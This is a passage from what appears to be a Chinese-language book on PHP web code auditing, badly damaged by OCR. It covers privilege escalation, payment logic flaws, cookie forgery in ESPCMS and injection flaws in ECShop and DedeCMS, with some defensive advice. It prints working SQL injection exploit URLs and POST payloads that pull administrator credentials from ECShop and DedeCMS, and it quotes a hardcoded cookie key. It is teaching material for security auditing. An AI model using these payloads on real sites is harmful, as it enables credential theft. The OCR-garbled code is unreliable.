越权 漏洞 分 为 水 平 越权 和 垂直 越权 ， 水 平 越权 指 原 相同 等 级 权限 的 用 户 ，A 用 户 可 以 查看 或 操作 到 B 用 户 的 私有 信息 ， 而 这 个 查看 或 操作 权限 本 来 是 A 用 户 不 该 拥有 的 权限 。 垂 直 权 限 指 不 在 同 权限 等 级 
的 用 户 ， 低 权限 等 级 的 用 户 A 可 以 查看 或 操作 高 权限 等 级 B 的 私有 信息 ， 而 这 个 查看 或 操作 权限 本 来 是 A 用 户 不 该 拥有 的 权限 。 


水 平 越权 和 垂直 越权 的 定义 不 一 样 ， 但 漏洞 原理 是 一 样 的， 都 是 账户 体系 上 在 判断 权限 时 不 严格 导致 存在 绕 过 漏洞 ， 这 一 类 的 绕 过 通常 发 生 在 cookie 验 证 不 严 、 简 单 判断 用 户 提交 的 参数 ， 归 根 结 底 ， 
都 是 因为 这 些 参数 是 在 客户 端 提交 ， 服 务 器 端 未 严格 校 验 。 举 个 简单 的 例子 ， 当 前 A 用 户 查 看 自己 详细 订单 的 URL 为 /1.php? orderid=111， 当 用 户 手动 提交 /1.php? orderid=112 时 ， 则 可 以 看 到 订单 id 为 
112 的 订单 详细 情况 。 这 里 的 逻辑 比较 简单 ， 不 再 使 用 代码 进行 讲解 分 析 。 


6.2.1.3 ”未 exit 或 return 引 发 的 安全 问题 


某 些 情况 下 ， 在 经 过 if 条 件 判断 之 后 ， 有 两 种 操作 ， 一 种 是 继续 执行 if 后 面 的 代码 ， 另 外 一 种 是 在 if 体内 退出 当前 操作 ， 但 是 这 个 退出 行为 ， 有 不 少 程序 忘记 写 return、die () 或 者 exit () ， 导 致 程序 
还 是 会 继续 执行 。 我 们 来 看 一 个 举例 ， 代 码 如 下 : 





«? php 
if (file exists ('install.lock') ) ) 
{ 








// 程 序 已 经 安装 ， 跳 转 到 首页 


header ("Location: http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/OEBPS/Text/../") ; 


} 
//… 进 入 安装 流程 





很 多 程序 的 安装 页 面 install.php 文 件 的 内 容 都 有 这 么 一 段 判断 程序 是 否 已 经 安装 的 代码 ， 这 段 代 码 的 意思 是 ， 判 断 “install.lock” 文 件 是 否 存在 ， 如 果 存 在 则 跳 转 到 首页 ， 问 题 出 在 使 用 了 header () 
函数 跳 转 ， 但 是 PHP 程 序 并 没有 退出 ， 还 是 会 进入 安装 流程 。 我 们 把 代码 改 一 下 来 测试 这 个 header () Bax, ASR RATA: 





<? php 
if ($ GET['var']---'aa') 
{ 





// 程 序 已 经 安装 ， 跳 转 到 首页 
header ("Location: http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/OEBPS/Text/../") ; 





} 
echo $ GET['var']; 








当 我 们 用 浏览 器 访问 的 时 候 是 看 不 到 输出 的 $_GET 参 数 的， 因为 浏览 器 接受 到 跳 转 指令 后 会 立马 跳 转 ， 我 们 用 burp 来 抓 返回 的 数据 如 图 6-9 所 示 。 


Params | Edited | Status 
GET /test/1_php?var=aa 





y | Headers 


HTTP/ 1. 1 302 Found 

Date: Hon, 11 ^ £013 :z50:337 GAL 

Server: Apache/2.4.10 (Win32) OpenSSL/0.98.8zb PHP/5.3.29 
X-Powered-By: i ee ios 

Location: ..f 

Content-Length: Z 

Keep-Alive: timeout=5, max-100 

Connection: Keep-Alive 

Content-Type: text/html 


ac 





图 6-9 


可 以 看 到 输出 了 “aa”， 说 明 经 过 header () 函数 之 后 程序 依然 继续 执行 了 ， 正 确 的 写法 应 该 是 在 header () 函数 之 后 加 一 个 exit () 或 者 die () 。 
6.2.1.4 ”常见 支付 漏洞 


曾经 有 不 少 体 量 不 小 的 电子 商务 网 站 都 出 现 过 支付 漏洞 ， 最 终 导 致 的 结果 是 不 花 钱 或 者 花 很 少 的 钱 买 更 多 的 东西 ， 还 真 的 有 不 少 人 测试 漏洞 之 后 真 的 收 到 了 东西 ， 这 种 天 上 掉 馅 饼 的 漏洞 太 有 诱惑 力 
了 。 最 常见 的 支付 漏洞 有 四 种 ， 下 面 我 们 来 看 看 这 四 种 情况 在 代码 审计 的 时 候 应 该 怎么 挖 。 


第 一 、 二 、 三 种 比较 简单 ， 分 别 是 客户 端 可 修改 单价 、 总 价 和 购买 数量 ， 服 务 器 端 未 校 验 严格 导致 ， 比 如 在 支付 的 时 候 一 般 购物 车 都 如 图 6-10 所 示 。 
全 部 商品 1 mum. | 浙江 杭州 市 西湖 区 v 
Ww x3 piar ter d Jte) 操作 

4 KAS MRE 


RAE REPEATS LSE TE | HSN EEYR 6840.00 | 1 | 6840.00 RIF; 


22x OA ASA IER, SERE Beha s PES ner E EU 移 到 我 的 关注 


国 2x WAR 。 移 到 我 的 关注 Sane ae ee — 
EH: -¥0.00 | 





图 6-10 


从 图 中 我 们 可 以 看 到 三 个 关键 元 素 ， 单 价 、 总 价 和 数量 ， 这 三 个 数字 不 管 是 哪个 被 改变 ， 都 会 影响 最 终 成 交 价 格 ， 部 分 商城 程序 是 直接 由 单价 和 数量 计算 总 价 ， 但 是 并 没有 验证 这 两 个 数字 是 否 小 于 0， 
在 上 图 的 例子 中 ， 驾 驶 服务 器 没有 验证 数量 这 个 数字 ， 我 们 可 以 在 客户 端 把 数字 改 成 负数 然后 提交 上 去 ， 这 类 的 case 很 多 ， 具 体 的 可 以 到 乌云 (wooyun.org) 查看 ， 这 种 形式 的 支付 漏洞 ， 只 要 我 们 找到 
支付 功能 代码 ， 看 看 代码 过 滤 情 况 即 可 挖掘 到 。 


还 有 一 种 是 以 重复 发 包 来 利用 时 间 差 ， 以 少量 的 钱 多 次 购买 ， 说 到 大 家 以 前 听 过 比较 多 的 就 是 手机 刷 QQ 钼 了 ， 也 是 利用 同样 的 原理 ， 利 用 手机 快速 给 腾讯 发 送 一 条 开通 QQ 业务 的 短信 ， 发 送 完 之 后 再 
快速 友 送 一 条 取消 业务 的 短信 到 短信 运营 商 ， 真 正 的 漏洞 出 现在 短信 运营 商 那 边 而 不 是 腾讯 。 很 多 IDC 开 通 VPS 等 业务 的 系统 也 存在 这 种 漏洞 ， 大 概 的 原理 如 图 6-11 所 示 。 


我 们 从 图 中 可 以 看 到 一 开始 程序 判断 余额 足够 ， 然 后 两 个 订单 都 进入 到 服务 开通 流程 ， 但 是 并 还 没有 扣 费 ， 我 们 就 是 利用 这 个 服务 开通 流程 所 花费 的 时 间 来 多 次 开通 业务 。 


我 们 在 做 代码 审计 挖掘 这 类 漏洞 的 时 候 ， 可 以 注意 寻找 下 面 这 种 形式 的 代码 : 


余额 10 元 一 个 订单 10 元 


订单 A 服 务 开 通 中 
订单 B 服 务 开 通 中 


10-10-10--107r 


扣 去 订单 A 
扣 去 订单 B 





E 6-11 


«? php 
//FURPRAG LY, Æ A true 
if (check money ($price) ) 


{ 





//Do something 
// 36 Re JURY 


Smoney = Smoney - Sprice; 


或 者 是 在 “Do something” 代 码 段 的 地 方 调用 其 他 APl 或 脚本 ， 而 扣 费 也 是 在 其 他 API 或 脚本 里 面 完成 。 
6.2.1.5“Ecshop 逻 辑 错误 注入 分 析 


这 里 我 们 用 一 个 比较 经 典 的 ecshop 支 付 宝 支 付 插件 漏洞 来 分 析 一 下 ， 据 说 这 个 漏洞 出 自 360 攻 防 实验 室 。 漏 洞 核心 代码 在 \includes\modules\payment\alipay.php 文 件 respond () 国 数 ， 代 码 如 
下 : 





function respond () 





if (! empty ($ POST) ) 

{ 

foreach ($ POST as Skey => $data) 
{ 


$ GET[Skey] = $data; 





} 
} 
Spayment = get payment ($ GET['code']) ; 
$seller email = rawurldecode ($ GET['seller email']) ; 
Sorder sn = str replace ($ GET['subject'], '', $ GET['out trade no']) ; 
Sorder sn = trim (S$order sn) ; 
/* 检查 支付 的 金额 是 否 相符 */ 
if (! check money ($order sn, $ GET['total fee']) ) 














{ 
[*---- liso] 


$order sn 变量 由 str_replace ($ GET['subject'], ", $ GET['out trade no]) ; 控制 ， 我 们 可 以 通过 $_ GET['subject'] 参 数 来 替换 掉 $ GET['out trade no'] ZZ TRIBSIS SUITS, 


最 终 $order sn 被 带 入 check_ money () 函数 。 我 们 跟 进 看 一 下 在 includeNlib_payment.php 文 件 中 109 行 ， 代 码 如 下 : 


function check money ($log id, Smoney) 














$sql = 'SELECT order amount FROM ' . SGLOBALS['ecs']->table ('pay log’) 
" WHERE log id = '$1og id'"; 

















Samount = SGLOBALS['db']-»getOne ($sql) ; 
if ($money == Samount) 
{ 


/*---- 省 略 ----*/ 














此 处 就 是 漏洞 现场 。 原 来 的 gorder_sn 被 带 入 了 数据 库 导 致 注入 漏洞 存在 ， 这 个 漏洞 的 逻辑 问题 就 在 于 本 来 一 个 已 经 过 滤 掉 特殊 字符 的 参数 ， 又 再 次 被 用 户 自 定义 提交 上 来 的 参数 替换 ， 导 致 原来 的 过 滤 
符合 反 斜 杠 被 蔡 换 掉 ， 程 序 员 在 写 代 码 的 时 候 没有 考虑 到 这 块 的 逻辑 问题 。 


利用 实践 : 首先 我 们 要 通过 str_replace 来 达到 我 们 想 要 的 效果 ，%00 是 截断 符 ， 即 也 为 NULL，NULL 值 是 与 0 相等 的 ， 测 试 代码 如 下 : 





<? php 

$a=addslashes ($ GET['a']) ; 
$b=addslashes ($ GET['b']) ; 
print r ($a.'<br />') ; 
print r ($b.'<br /»')43 


print r (str replace ($a, '', $b) ) ; ? > 











效果 图 如 图 6-12 所 示 。 
= $ SQL- XSS- Encryption. Encoding- 


| http/localhost/test/1.php?a-z 08h - 9600 


$a-addslashes($ GET['a']):; 


Sb=addslashes($ GET['b']); 
print r($a.'«br />'); 


Enable Post data Enable Referrer 
print r($b.'«br /»'); 





图 6-12 


最 终 漏洞 的 利用 效果 如 下 : 


EXP: http: //localhost/ecshop/respond.php? code-alipay&subject-0&out trade no-$00 and (select * from (select count (*) , concat (floor (rand (0) *2) , (select concat (user nam 








结果 如 图 6-13 所 示 。 


| [1 ECSHOP EEPO 
INT +| =a ¢ SOL XSS- Encryption" Encoding- Other- 
qe) loadURL —http//localhost/ecshop/respond.php?code-alipay&subject-O&out trade no-9600' and (select * from (select count(*),concat(lloor(rand(0)*2), (select concat(user name,password) 
; from ecs admin, user limit 1))a from information_schema.tables group by alb) -- by Seay 
N Split URL 
| b ^ Execute | 
[^] Enable Post data [F] Enable Referrer 








e e localhost/ecshop/respond php?code-alipay&subject-U&out trade no= and (select * from (select count" concat(Hoortr C 时- Google Pod GA wow 


MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sal] => SELECT order amount 
FROM ecshop . ecs pay log WHERE log id = *\\’ and (select * from (select count(*), concat (floor (rand Ò *2), (select 
concat(uscr namc, password) from ccs admin user limit 1))a from information schema. tables group by alb) — by Seay’ ) [2] => Array 


( [error] => Duplicate entry "Üadminbaf07T1d435c43c83b373cf2cd3383f41' for key group key ) [3] => Array ( [errno] => 1062 ) ) 





图 6-13 


6.2.2 漏洞 防范 


通过 分 析 我 们 之 前 列举 的 几 种 逻辑 漏洞 ， 可 以 看 到 所 有 的 逻辑 漏洞 都 是 因为 开发 者 对 业务 逻辑 或 者 代码 逻辑 理解 不 清楚 导致 。 每 一 种 业务 功能 都 有 可 能 导致 逻辑 漏洞 的 产生 ， 而 业务 功能 里 面 的 实现 逻 
辑 是 人 思考 出 来 的 ， 所 以 要 解决 这 类 逻辑 问题 需要 注意 以 下 两 点 : 


` 要 深入 熟悉 业务 逻辑 ， 只 有 我 们 熟悉 了 业务 的 逻辑 ， 才 能 根据 业务 需要 编写 满足 需求 而 又 不 画蛇添足 的 代码 。 


` 要 注意 多 苑 悉 函 数 的 功能 和 差异 ， 因 为 很 多 写 代码 写 得 很 熟悉 的 人 出 现 bug 通 常 不 是 因为 多 一 个 字母 或 者 少 一 个 分 号 ， 而 是 代码 执行 逻辑 上 面 考虑 不 周全 时 致 。 


6.3 “会话 认 证 漏洞 


会 话 认 证 是 一 个 非常 大 的 话题 ， 涉 及 各 种 认证 协议 和 框架 ， 如 cookie、session、sso、oauth、openid 等 ， 出 现 问题 比较 多 的 在 cookie 上 面 ，cookie 是 Web 服 务 器 返回 给 客户 端的 一 段 常用 来 标识 用 户 
身份 或 者 认证 情况 的 字符 串 ， 保 存在 客户 端 ， 浏 览 器 下 次 请 求 时 会 自动 带 上 这 个 标识 ， 由 于 这 个 标识 字符 串 可 以 被 用 户 修改 ， 所 以 存在 安全 风险 ， 一 般 这 块 的 认证 安全 问题 都 出 在 服务 端 直接 取 用 cookie 的 
数据 而 没有 校 验 ， 其 次 是 cookie 加 密 数 据 存 在 可 预测 的 情况 。 另 外 是 session 是 保存 在 服务 器 端的 信息 ， 如 果 没 有 代码 操作 ， 客 户 端 不 能 直接 修改 session， 相 对 比较 安全 。 


sso、oauth、openid 与 cookie、session 相 比 不 是 一 个 维度 的 东西 ， 由 于 这 块 在 应 用 代码 审计 没有 什么 合适 的 案例 ， 暂 时 先 不 介绍 
6.3.1 ”挖掘 经 验 


认证 漏洞 在 代码 审计 的 时 候 能 遇 到 比较 多 的 是 出 现在 cookie 验 证 上 面 ， 通 常 是 没有 使 用 Session 来 认证 ， 而 是 直接 将 用 户 信息 保存 在 cookie 中 ， 程 序 使 用 的 时 候 直接 调用 。 一 般 这 个 过 程 都 有 一 个 统一 的 
国 数 去 取 数 据 调 用 ， 容 易 导 致 SQL 注入 和 越权 等 漏洞 。 在 挖掘 登录 认证 漏洞 的 时 候 ， 可 以 先 看 一 下 程序 的 登录 功能 代码 ， 看 看 整个 登录 过 程 的 业务 逻辑 有 没有 可 以 控制 session 值 或 者 直接 绕 过 密码 验证 的 漏 
iB; 另外 需要 关注 程序 验证 是 否 为 登录 的 代码 ， 通 俗 的 说 是 验证 cookie 的 代码 ， 是 不 是 直接 去 取 cookie 里 面 的 值 ， 然 后 怎么 去 判断 这 个 值 来 验证 是 否 登录 。 以 前 见 过 相当 粗糙 的 验证 是 直接 判断 cookie 里 面 
的 username 参 数 是 否 为 空 ， 还 有 就 是 以 cookie 里 面 的 用 户 名 来 作为 当前 用 户 ， 这 种 情况 直接 把 用 户 名 改 成 admin 等 管理 员 用 户 名 就 直接 是 管理 员 权 限 了 。 


6.3.1.1 cookie 认 证 安全 


cookie 可 以 保存 任何 字符 串 ， 各 个 浏览 器 保存 cookie 字 节 数 大 小 不 一 样 ， 一 般 都 不 超过 4096 个 字 节 ， 通 常 cookie 用 来 保存 登录 账号 的 标识 信息 ， 比 如 用 户 名 或 者 sessionid 等 ， 浏 览 器 每 次 请 求 的 时 候 
都 会 再 次 带 上 对 应 这 个 域名 的 cookie 信 息 ， 服 务 器 应 用 程序 可 以 对 cookie 进 行 读 取 修 改 或 者 删除 等 任意 操作 。 


cookie 出 现 问题 比较 多 的 是 cookie 的 SQL 注入 等 常见 漏洞 ， 以 及 Web 应 用 程序 在 服务 端 直接 读 取 cookie 的 用 户 名 或 者 ID 值 来 操作 当前 这 个 用 户 的 数据 ， 这 里 存在 很 大 的 一 个 问题 是 cookie 可 以 伪造 ， 从 
而 就 导致 了 伪造 用 户 身份 登录 的 漏洞 。 


通常 一 个 cookie 验 证 的 代码 大 概 如 下 : 


<? php 
session start () ; 
function login () 


{ 








if (账号 密码 正确 ) 

{ 

setcookie ('username', 'admin') ; 
$ SESSION['username'] = 'admin'; 
} 

















/判断 cookie 里 面 的 用 户 名 是 否 和 Session 里 的 用 户 名 一 致 
f ($ COOKIE['username']---$ SESSION['username']) 











a p. 





// 操 作 $ SESSION ['username '] 用 户 的 数据 


login () ; 





问题 ， 下 面 我们 通过 案例 来 看 看 有 问题 的 写法 。 
6.3.1.2. ”Espcms 任 意 用 户 登 录 分 析 


我 们 这 里 以 乌云 漏洞 编号 为 WooYun-2015-90324 的 “ESPCMS 所 有 版 本 任意 用 户 登录 ”漏洞 来 做 一 个 简单 的 分 析 。 


在 文件 /interface/memebermain.php 的 in_center () 函数 可 以 看 到 如 下 代码 : 





function in center () { 
if (Sthis->CON['mem isucenter']) ( 
include once admin ROOT . 'public/uc client/client.php'; 


} 













































































parent: : start pagetemplate C 

parent: : member purview () ; 

$1ng = (admin ING == 'big5') ? S$this->CON['is lancode'] : admin LNG; 

$db where = "userid-$this-»ec member username id AND username-'$this-» ec member username' "; 

$db tablel = db prefix . 'member AS a'; 

$db table2 = db prefix . 'member value AS b'; 

$db sql = "SELECT * FROM $db tablel LEFT JOIN $db table2 ON a.userid = b.userid WHERE a.userid = $this-»ec member username id "; 
$rsMember = Sthis->db->f tch first ($db sql) ; 























SrsMember['rankname'] = 

Suserid = $this-»ec memb 
(empty (Suserid) ) d 

exit ('user err! ') ; 





e 
Sthis-»get 1 member “purview (SrsMember['mcid'], 'rankname') ; 
er username id;  //ikJKuserid 








H: 
rh 


} 
$db table 
$db where 





db prefix . "order"; 
" WHERE userid=Suserid"; 














在 代码 中 $userid=$this->ec_member username id; 这 行 代 码 设置 当前 用 户 ID， 随 后 根据 这 个 $userid 变 量 去 直接 操作 这 个 id 的 用 户 数据 ， 而 这 个 $this->ec_member_username id 变量 的 值 又 是 从 
哪 来 的 呢 ? 注意 代 码 最 开始 的 地 方 有 调用 parent: : member purview () 函数 ， 我 们 跟 过 去 看 看 ， 在 /public/class connector.php 文 件 的 member purview () Bax, ASIF: 












































function member purview ($userrank = false, Surl = null, Supurl = false) { 
Sthis->ec member username = S$this-^i Fun-»eccode (Sthis-»fun-» accept (' ecisp | member username' 'C'), 'DECODE', db pscode) ; 
$user info = explode ('|', $this-»fun-»eccode ($this->fun-> accept ('ecisp member info', "cl Jus "DE |CODE', db pscode) ) ; 











list ($this-»ec member username id, $this->ec member alias, $this-» ec member integral, $this- >ec member mcid, $this-»ec member email, $this->ec member lastip, $this- 


可 以 看 到 list () 函数 中 使 用 $user info 数 组 为 9this->ec_ member username id 变量 进行 赋值 ， 而 $user info 数 组 是 从 cookie 中 解密 出 来 的 ， 关 于 这 个 算法 的 加 密 代码 在 /public/class function.php 
文件 的 eccode () 函数 ， 代 码 如 下 : 























function eccode ($string, Soperation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%', Smcrype = true) | 
Sresult = null; 

if (Soperation == 'ENCODE') { 

for ($i = 0; $i < strlen ($string) ; $i++) { 
Schar = substr ($string, $i, 1) ; 
Skeychar = substr ($key, (Si % strlen (Skey) ) - 1, 1); 
Schar = chr (ord (Schar) + ord (Skeychar) ) ; 







































































Sresult.=Schar; 

} 
$result = base64 encode ($result) ; 
$result = str replace (array ('4', '/', '=') , array ('-', ' ', '') , $result) ; 
) elseif (Soperation == 'DECODE') 

$data = str replace (array ('-', ' ') , array ('+', '/') , $string) ; 

$mod4 = strlen ($data) % 4; iu 

if ($mod4) { 

Sdata .= substr ('====', Smod4) ; 


} 

$string = base64 decode ($data) ; 

for ($i = 0; $i < strlen ($string) ; $i++) | 
Schar = substr ($string, $i, 1) ; 
Skeychar = substr ($key, (Si % strlen ($key) ) - 1, 1); 
Schar = chr (ord (Schar) - ord (Skeychar) ) ; 
Sresult.=Schar; 











} 
} 
return Sresult; 


} 








这 是 一 个 很 明显 的 可 逆 算 法 ， 这 里 就 不 再 重点 分 析 这 个 算法 。 
6.3.2 ”漏洞 防范 


所 有 用 户 输入 的 值 都 是 不 完全 可 信和 的 ， 所 以 在 防御 认证 漏洞 之 前 ,我们 应 该 先 了 解 认证 的 业务 逻辑 ， 严 格 限制 输入 的 异常 字符 以 及 避免 使 用 客户 端 提 交 上 来 的 内 容 去 直接 进行 操作 。 应 该 把 cookie 和 
session 结 合 起 来 使 用 ， 不 能 从 cookie 中 获取 参数 值 然后 进行 操作 。 另 外 在 设置 session 时 ， 需 要 保证 客户 端 不 能 操作 敏感 session 参 数 。 


特别 需要 注意 的 是 敏感 数据 不 要 放 到 cookie 中 ， 目 前 还 有 不 少 应 用 会 把 账号 和 密码 都 直接 放 入 到 cookie 中 ，cookie 在 浏览 器 端 以 及 传输 过 程 中 都 存在 被 窃取 的 可 能 性 ， 如 果 程 序 限 制 了 一 个 用 户 只 能 同 
时 在 一 个 IP 上 面 登 录 ， 这 时 候 即 使 别人 拿 到 了 你 不 带 密 码 的 cookie 也 会 使 用 不 了 ， 但 是 如 果 cookie 里 面 保存 了 用 户 名 和 密码 ， 这 时 候 攻 击 者 就 可 以 尝试 用 密码 直接 登录 了 。 


第 7/ 章 ”二 次 漏洞 审计 


二 次 漏洞 有 点 像 存 储 型 XSs 的 味道 ， 就 算 payload 插 进去 了 ， 能 不 能 利用 还 得 看 页 面 输出 有 没有 过 滤 ， 由 于 这 一 类 漏洞 挖掘 起 来 逻辑 会 稍微 复杂 一 点 ， 针 对 性 挖掘 的 人 比较 少 ， 所 以 目前 这 方面 还 属于 重 
灾区 ， 大 多 数 应 用 只 要 肯 仔 细 去 通读 研究 全 文 代码 ， 理 解 业务 逻辑 ， 还 是 能 挖 出 来 部 分 二 次 漏洞 的 。 既 然 二 次 漏洞 现在 这 么 严重 ， 那 么 我 们 来 看 看 什么 是 二 次 漏洞 以 及 怎样 挖掘 。 


7.1 什么 是 二 次 漏洞 


需要 先 构造 好 利用 代码 写 入 网 站 保存 ， 在 第 二 次 或 多 次 请 求 后 调用 攻击 代码 触发 或 者 修改 配置 触发 的 漏洞 叫做 二 次 漏洞 ， 举 一 个 简单 的 SQL 注入 例子 ， 攻 击 者 A 在 网 站 评论 的 地 方 发 表 了 带 有 注入 语句 的 
评论 ， 这 时 候 注 入 语句 已 经 被 完整 地 保存 到 数据 库 中 ， 但 是 评论 引用 功能 存在 一 个 SQL 注入 漏洞 ， 于 是 攻击 者 在 评论 处 引用 刚 提交 的 带 有 注入 语句 的 评论 ， 提 交 后 server 端 从 数据 库 中 取出 第 一 次 的 评论 ， 
由 于 第 一 次 评论 中 带 有 单 引号 可 闭合 第 二 次 的 语句 ， 从 而 触发 了 注入 漏洞 ， 这 是 一 个 非常 经 典 的 而 又 真实 的 案例 ， 它 就 是 在 2013 年 5 月初 被 公布 的 dedecms 评 论 二 次 注入 漏洞 ， 不 过 当时 还 有 一 个 非常 精彩 
的 60 个 字符 长 度 限 制 突破 ， 稍 后 我 们 在 案例 里 面 分 析 这 个 漏洞 的 来 龙 去 脉 。 


二 次 漏洞 的 出 现 归根 结 底 是 开发 者 在 可 信 数 据 的 逻辑 上 考虑 不 全 面 ， 开 发 者 认为 这 个 数据 来 源 或 者 这 个 配置 是 不 会 存在 问题 的 ， 而 没有 想到 另外 一 个 漏洞 能 够 修改 这 些 “ 可 信 ” 数据， 整个 漏洞 产生 的 


写 人 攻击 代码 


流程 图 如 图 7-1 所 示 。 


database 





提交 攻击 请 求 读 取 攻击 代码 





图 7-1 


这 样 的 漏洞 没有 很 大 的 逻辑 关联 ， 所 以 在 发 现 和 修补 上 面 都 比 一 般 的 直接 利用 的 漏洞 相对 复杂 一 点 。 


7.2 ”二 次 漏洞 审计 技巧 
虽然 二 次 漏洞 写 入 payload 和 触发 payload 很 可 能 不 在 一 个 地 方 ， 但 是 还 是 可 以 通过 找 相关 关键 字 去 定位 的 ， 只 是 精准 度 会 稍稍 降低 ， 比 如 可 以 根据 数据 库 字 段 、 数 据 表 名 等 去 代码 中 搜索 ， 大 多 数 二 次 
漏洞 的 逻辑 性 比 一 般 的 漏洞 强 得 多 ， 所 以 为 了 更 好 地 挖掘 到 二 次 漏洞 ， 最 好 还 是 把 全 部 代码 读 一 遍 ， 这 样 能 帮助 我 们 更 好 地 了 解 程序 的 业务 逻辑 和 全 局 配置 ， 读 代码 挖 的 时 候 肯 定 轻松 加 愉快 。 


业务 逻辑 越 是 复杂 的 地 方 越 容易 出 现 二 次 漏洞 ， 我 们 可 以 重点 关注 购物 车 、 订 单 这 块 ， 另 外 还 有 引用 数据 、 文 章 编辑 、 草 稿 等， 这 些 地 方 是 跟 数 据 库 交 互 的 ， 跟 文件 系统 交互 的 就 是 系统 配置 文件 了 ， 
不 过 一 般 这 些 都 是 需要 管理 员 权限 才能 操作 。 而 在 二 次 漏洞 类 型 里 面 ， 我 们 可 以 重点 关注 SQL 注入 、XsSs。 


7.3 dedecms DREAN EAT 


顺便 找 一 找 还 是 能 找到 不 少 二 次 漏洞 很 经 典 的 案例 ， 这 里 我 们 还 是 以 dedecms 的 feedback.php 文 件 引 用 评论 的 SQL 注入 漏洞 来 做 一 个 分 析 ， 该 漏洞 在 2013 年 3 月 在 乌云 网 被 公布 ， 漏 洞 编号 WooYun- 
2013-18562， 作 者 为 safekey 团 队 的 yy520， 公 布 初期 还 有 一 个 60 个 注入 字符 的 限制 ， 在 经 过 safekey 团 队 的 讨论 后 成 功 绕 过 了 这 个 限制 使 得 漏洞 利用 并 不 鸡肋 。 在 漏洞 公布 之 后 ， 官 方 立即 采取 措施 进行 了 
漏洞 修复 ， 但 非 专业 安全 的 人 修复 漏洞 都 有 一 个 通病 ， 不 会 做 漏洞 联想 ， 别 人 指出 哪 有 漏洞 就 修 哪 ， 跟 这 个 漏洞 同样 利用 方式 的 漏洞 ， 在 另外 一 个 文件 至 今 几 年 过 去 了 还 存在 。 


漏洞 在 /plus/feedback.php 文 件 ， 代 码 如 下 : 


// 保 存 评论 内 容 


f (Scomtype == 'comments') 





~H 


Sarctitle = addslashes ($title) ; // 保 存 评论 的 文章 标题 

















$typeid = intval ($typeid) ; 

Sischeck = intval ($ischeck) ; 

Sfeedbacktype = preg replace ("#[*0-9a-z]#i", "", Sfeedbacktype) ; 

if ($msg! ='') i 

{ Sinquery = "INSERT INTO ^48 feedback? (^aid?, ^typeid/, "username", ‘arctitle’, ‘ip’, 'ischeck^, ‘dtime’, ‘mid’, “bad*, ^good', ^ftype', ‘face’, "msg") Vi 


























这 段 代码 的 功能 是 保存 用 户 在 文章 评论 页 面 提交 的 评论 信息 ， 其 中 : 


Sarctitle = addslashes ($title) ; 


获取 被 评论 的 文章 标题 ， 这 里 使 用 了 addslashes () 函数 过 滤 ， 接 着 : 





























Sinquery = "INSERT INTO ^48 feedback? (^aid^, ^typeid/, "username", ^arctitle^, ^ip', "ischeck^, ‘dtime’, ‘mid’, "bad, ^good', “ftype*, ‘face’, "msg^) VALUES ('S$aid', 'Stypeic 
$rs = $dsql->ExecuteNoneQuery (Sinquery) ; 





将 提交 的 $arctitle 变 量 保存 到 数据 库 中 ， 这 个 过 程 是 没有 问题 的 ， 我 们 接着 看 : 


// 引 用 回复 
elseif ($comtype == 'reply') 
{ 





$row = $dsql->GetOne ("SELECT * FROM ^48 feedback’ WHERE id ='$fid'") ; 

Sarctitle = $row['arctitle']; // 取 出 之 前 保存 的 文章 标题 

Said =Srow['aid']; 

$msg = Squotemsg.Smsg; //echo $msg."«br /><br /»"; 

$msg = HtmlReplace ($msg, 2) ; 

// 将 SarctitLle 插 入 到 数据 库 

Sinquery = "INSERT INTO ^48 feedback? (‘aid*, “typeid’, "username", ‘arctitle’, "ip^, "ischeck^, "dtime', ‘mid’, “bad*, ^good', ^ftype', ‘face’, "msg") 
VALUES ('$aid', 'Stypeid', 'Susername', 'Sarctitle', 'Sip', 'Sischeck', 'Sdtime', '{$cfg ml->M IDJ', '0', '0', 'Sfeedbacktype', 'Sface', '$msg') "; 

$dsql-»ExecuteNoneQuery (Sinquery) ; 





















































这 段 代 码 的 作用 是 引用 之 前 的 评论 到 新 的 评论 中 ， 其 中 : 


$row = $dsql-»GetOne ("SELECT * FROM "$8 feedback" WHERE id ='$fid'") ; 
Sarctitle = $row['arctitle']; // 取 出 之 前 保存 的 文章 标题 





取出 之 前 提交 的 文章 标题 ， 赋 值 给 $yarctitle 变 量 ， 再 往 下 : 























Sinquery = "INSERT INTO ^48 feedback’ (‘aid*, “typeid’, ‘username’, ^"arc-title^, "ip^, "ischeck^, "dtime', ‘mid’, “bad*, ^good', ^ftype', ‘face’, msg ) 
VALUES ('$aid', 'Stypeid', 'Susername', 'Sarctitle', 'Sip', 'Sischeck', 'Sdtime', '{$cfg ml->M IDJ', '0', '0', 'Sfeedbacktype', 'Sface', '$msg') "; 
Sdsql->ExecuteNoneQuery (Sinquery) ; 





























可 以 看 到 $arctitle 变 量 被 写 入 到 数据 库 ， 看 到 这 里 还 记 不 记得 ， 这 个 $arctitle 是 由 用 户 提交 的 ， 第 一 次 写 入 数据 库 的 时 候 使 用 了 addslashes () 函数 过 滤 ， 但 是 引用 评论 重新 写 入 数据 库 的 时 候 并 没 
过 滤 ， 文 章 标题 的 数据 在 整个 流程 的 变化 如 图 7-2 所 示 。 


第 一 次 SQL 





用 SQL 来 表示 一 下 如 下 : 


第 一 次 插入 的 SQL 为 : 





insert into xx (arctitle) values ('11\'') ; 


保存 到 数据 库 的 标题 内 容 为 11'， 然 后 这 个 数据 被 select 查 询 出 来 拼接 到 第 二 次 插入 的 SQL 上 ，SQL 语 句 如 下 : 

insert into xx (arctitle) values ('11'') ; 

可 以 看 到 引发 了 SQL 注入 。 

在 这 个 漏洞 中 ， 标 题字 段 有 60 个 字符 的 长 度 限制 ， 不 能 一 次 性 把 完整 的 payload 写 入 进去 ， 所 以 我 们 需要 两 次 提交 payload， 最 终 利用 方式 如 下 ， 第 一 次 请 求 提交 
/plus/feedback.php? aid-52 


POST 内 容 : 








action-send&comtype-comments&aid-52&isconfirm-yes&msg-xx&validate-BRUN&title-xx', (char (@*'*) ) , /* 





我 们 打印 SQL 语句 出 来 看 看 ， 如 图 7-3 所 示 。 


© LoadURL  http;//localhost/dedecms//plus/feedback.php?aid -52 
Ü Split URL 


Q) Execute 


Enable Post data Enable Referrer 
Post data action-send&comtype-comments&aid -528&uisconfirmzyes&imsg -xx&validate- BRUN &ttitle =x, (char(@™)),/* 


INSERT INTO 4€ feedback (aid , typeid , username , arctitle , ip , ischeck , dtime , 
